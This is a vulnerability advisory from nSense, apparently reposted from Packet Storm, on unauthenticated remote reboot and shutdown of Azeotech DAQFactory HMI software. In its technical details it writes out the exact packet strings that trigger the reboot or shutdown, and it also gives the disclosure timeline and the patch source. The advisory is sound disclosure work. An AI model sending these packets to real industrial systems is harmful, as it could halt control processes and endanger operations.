Home / vulnerabilities Azeotech DAQFactory Shutdown
Posted on 13 October 2011
Source : packetstormsecurity.org Link
nSense Vulnerability Research Security Advisory NSENSE-2011-004
---------------------------------------------------------------
Affected Vendor: Azeotech
Affected Product: DAQFactory
Platform: Windows
Impact: Remote reboot/shutdown
Vendor response: Patch
CVE: None
Credit: Knud / nSense
Technical details
---------------------------------------------------------------
The default configuration allows network connections towards
the HMI without authentication. This allows an attacker on the
network to shut down the machine running the HMI software by
sending a packet as outlined below:
preamble:
"x01x00x09x00CPasswordx00"
reboot:
"x01x00x0fx00CCommandGenericx01x00x00x00x04x00x00x00"
shutdown:
"x01x00x0fx00CCommandGenericx01x00x00x00x06x00x00x00"
Timeline:
20110412 Contacted ICS-CERT
20110413 ICS-CERT acknowledges receipt of information
20110413 ICS-CERT creates ticket,# ICS-VU-240775
20110502 Vendor creates patch, releases advisory to customers
20110625 ICS-CERT releases advisory
20110727 Vendor responds, CVE assigned, patch 20110809
Solution
Install the latest version from the vendor:
http://www.azeotech.com/downloads.php
Links:
http://www.nsense.fi http://www.nsense.dk
$$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s.
$$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$
$$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$
$$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$
$$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P
D r i v e n b y t h e c h a l l e n g e _
